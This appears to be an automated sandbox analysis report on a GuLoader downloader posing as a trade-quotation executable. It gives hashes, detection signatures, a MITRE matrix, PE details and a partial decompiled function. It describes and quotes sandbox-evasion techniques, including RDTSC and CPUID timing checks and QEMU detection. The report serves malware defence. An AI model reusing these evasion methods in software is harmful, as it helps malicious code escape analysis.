Play interactive tour

Edit tour

Analysis Report JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Overview

General Information

Sample Name:	JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe
Analysis ID:	337903
MD5:	2fd73e6bfea5941b83a7f88159f0e3ae
SHA1:	348d0ec7b5d5957a41585f5f670f90282e6ce75e
SHA256:	550830c3012af3f38e4b3a4fbd7c5f34762d1176d4618977a4e0c148bab08bd7
Tags:	exeGuLoader
Most interesting Screenshot:
Errors Sigma syntax error: Has an empty selector, Rule: Abusing Azure Browser SSO

Detection

GuLoader

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Found potential dummy code loops (likely to delay analysis)

Initial sample is a PE file and has a suspicious name

Potential time zone aware malware

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Detected potential crypto function

PE file contains strange resources

Program does not show much activity (idle)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe (PID: 5136 cmdline: 'C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe' MD5: 2FD73E6BFEA5941B83A7F88159F0E3AE)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe PID: 5136	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe PID: 5136	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Virustotal: Detection: 12%

Perma Link

Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

System Summary:

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_00402F88	0_2_00402F88
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02295E33	0_2_02295E33
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_0229626A	0_2_0229626A
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02290252	0_2_02290252
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02295ECB	0_2_02295ECB
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02295AD9	0_2_02295AD9
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02295F31	0_2_02295F31
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02296705	0_2_02296705
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_022957BD	0_2_022957BD
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02296395	0_2_02296395
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_0229841D	0_2_0229841D
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_0229244E	0_2_0229244E
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02295C81	0_2_02295C81
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02295D2A	0_2_02295D2A
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_0229613B	0_2_0229613B
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02296509	0_2_02296509
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02293519	0_2_02293519
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02290162	0_2_02290162
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02293567	0_2_02293567
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_022959BC	0_2_022959BC
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02293589	0_2_02293589
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_0229358D	0_2_0229358D

Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe, 00000000.00000002.1737310362.0000000000416000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameFricandelle1.exe vs JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe
Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe, 00000000.00000002.1738227034.00000000021D0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe
Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Binary or memory string: OriginalFilenameFricandelle1.exe vs JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal84.troj.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA618075B7A804723.TMP

Jump to behavior

Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Virustotal: Detection: 12%

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe PID: 5136, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe PID: 5136, type: MEMORY

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_0040787B push C3C31A0Bh; ret	0_2_00407880
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_0040A14E push ss; iretd	0_2_0040A14F
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_0040AA56 push 4E927E2Fh; ret	0_2_0040AA5C
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_0040C333 push edi; retf	0_2_0040C334
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_00408F90 push FFFFFFABh; iretd	0_2_00408F9F
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_022950AC push ss; retf	0_2_022950AE
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02294546 push esi; ret	0_2_02294575
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_0229519D push eax; iretd	0_2_022951A6

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Code function: 0_2_02297644

0_2_02297644

Potential time zone aware malware

Show sources

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

System information queried: CurrentTimeZoneInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

RDTSC instruction interceptor: First address: 0000000002293853 second address: 0000000002293853 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FC5C8C91CE8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e push di 0x00000020 mov di, FE52h 0x00000024 pop di 0x00000026 add edi, edx 0x00000028 jmp 00007FC5C8C91CDEh 0x0000002a cmp ebx, 8E3A430Eh 0x00000030 dec ecx 0x00000031 cmp ecx, 00000000h 0x00000034 jne 00007FC5C8C91C65h 0x00000036 push ecx 0x00000037 cmp eax, ecx 0x00000039 call 00007FC5C8C91D07h 0x0000003e call 00007FC5C8C91CF8h 0x00000043 lfence 0x00000046 mov edx, dword ptr [7FFE0014h] 0x0000004c lfence 0x0000004f ret 0x00000050 mov esi, edx 0x00000052 pushad 0x00000053 rdtsc

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Code function: 0_2_0229322E rdtsc

0_2_0229322E

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Process Stats: CPU usage > 90% for more than 60s

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Code function: 0_2_0229322E rdtsc

0_2_0229322E

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02293653 mov eax, dword ptr fs:[00000030h]	0_2_02293653
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02296AA6 mov eax, dword ptr fs:[00000030h]	0_2_02296AA6
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_022922CB mov eax, dword ptr fs:[00000030h]	0_2_022922CB
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_022922D7 mov eax, dword ptr fs:[00000030h]	0_2_022922D7
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_02291C0A mov eax, dword ptr fs:[00000030h]	0_2_02291C0A
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_022960A4 mov eax, dword ptr fs:[00000030h]	0_2_022960A4
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_022960A6 mov eax, dword ptr fs:[00000030h]	0_2_022960A6
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_022925AB mov eax, dword ptr fs:[00000030h]	0_2_022925AB
Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	Code function: 0_2_022925BD mov eax, dword ptr fs:[00000030h]	0_2_022925BD

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe, 00000000.00000002.1738036580.0000000000D60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe, 00000000.00000002.1738036580.0000000000D60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe, 00000000.00000002.1738036580.0000000000D60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe, 00000000.00000002.1738036580.0000000000D60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe

Code function: 0_2_022928F4 cpuid

0_2_022928F4

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Virtualization/Sandbox Evasion11	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Security Software Discovery411	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	System Information Discovery211	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	12%	Virustotal		Browse
JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe	0%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	337903
Start date:	11.01.2021
Start time:	09:22:58
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.evad.winEXE@1/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 2.3% (good quality ratio 1.2%) Quality average: 30.3% Quality standard deviation: 29.6%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
Errors:	Sigma syntax error: Has an empty selector, Rule: Abusing Azure Browser SSO

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.919462194601296
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe
File size:	90112
MD5:	2fd73e6bfea5941b83a7f88159f0e3ae
SHA1:	348d0ec7b5d5957a41585f5f670f90282e6ce75e
SHA256:	550830c3012af3f38e4b3a4fbd7c5f34762d1176d4618977a4e0c148bab08bd7
SHA512:	0502b557e7b8c1a572b845c3b937b1bc9159fa653242731eb4cfa48604a6d4459c30094f39ab4260654ad619ac1067801ddc9d7d72c3b9abc63dda277173d4c7
SSDEEP:	768:OC1+flQrxF25W4Gw28WY7d/3uYBBQedgpiWLkdEKtOVJuBlSMM:tuI25JVWYB+YLQeKidE/WH2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......_.................0...0......\........@....@................

File Icon


Icon Hash:	6eeed0e4a4a4e0d2

Static PE Info

General
Entrypoint:	0x40135c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5FFBA48A [Mon Jan 11 01:06:18 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2a71f44ac1c823400003a5bea275b301

Entrypoint Preview

Instruction
push 00401E2Ch
call 00007FC5C8AB1DF5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+6Ah], bl
mov dh, dl
stosd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x12c94	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x89c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x10c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x12148	0x13000	False	0.390856291118	data	6.34991013672	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x14000	0x1174	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x16000	0x89c	0x1000	False	0.33154296875	data	3.03277487977	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x16334	0x568	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x16320	0x14	data
RT_VERSION	0x160f0	0x230	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaLateMemSt, __vbaObjSet, __vbaCyAdd, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaCyI2, __vbaStrCmp, __vbaVarTstEq, __vbaR4Str, __vbaObjVar, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaFpCmpCy, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarAdd, __vbaVarDup, __vbaVarLateMemCallLd, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Fricandelle1
FileVersion	1.00
CompanyName	Cloud Share
ProductName	bricklay
ProductVersion	1.00
OriginalFilename	Fricandelle1.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe PID: 5136 Parent PID: 5980

General

Start time:	09:23:47
Start date:	11/01/2021
Path:	C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe'
Imagebase:	0x400000
File size:	90112 bytes
MD5 hash:	2FD73E6BFEA5941B83A7F88159F0E3AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exe PID: 5136 Parent PID: 5980 JAN_QUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exeCOMMON

Executed Functions

Function 00410F34, Relevance: 144.4, APIs: 76, Strings: 6, Instructions: 921
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00410F34(signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				void* _v48;
				signed int _v68;
				signed int _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _v100;
				char _v108;
				intOrPtr _v116;
				char _v124;
				char* _v132;
				intOrPtr _v140;
				char* _v148;
				intOrPtr _v156;
				char* _v160;
				char _v164;
				signed int _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v196;
				intOrPtr _v200;
				char _v204;
				char* _v208;
				char _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				intOrPtr* _v276;
				signed int _v280;
				intOrPtr* _v284;
				signed int _v288;
				intOrPtr* _v292;
				signed int _v296;
				signed int _v300;
				intOrPtr* _v304;
				signed int _v308;
				intOrPtr* _v312;
				signed int _v316;
				signed int _v320;
				intOrPtr* _v324;
				signed int _v328;
				intOrPtr* _v332;
				signed int _v336;
				intOrPtr* _v340;
				signed int _v344;
				intOrPtr* _v348;
				signed int _v352;
				signed int _v356;
				intOrPtr* _v360;
				signed int _v364;
				intOrPtr* _v368;
				signed int _v372;
				intOrPtr* _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				intOrPtr* _v392;
				signed int _v396;
				intOrPtr* _v400;
				signed int _v404;
				signed int _t461;
				signed int _t465;
				signed int _t472;
				signed int _t476;
				char* _t480;
				signed int _t484;
				signed int _t491;
				signed int _t499;
				signed int _t503;
				char* _t507;
				signed int _t511;
				signed int _t518;
				signed int _t524;
				signed int _t528;
				char* _t532;
				signed int _t536;
				signed int _t540;
				signed int _t544;
				signed int _t548;
				signed int _t552;
				signed int _t565;
				signed int _t574;
				signed int _t578;
				char* _t582;
				signed int _t586;
				signed int _t590;
				signed int _t594;
				signed int _t607;
				signed int _t617;
				signed int _t624;
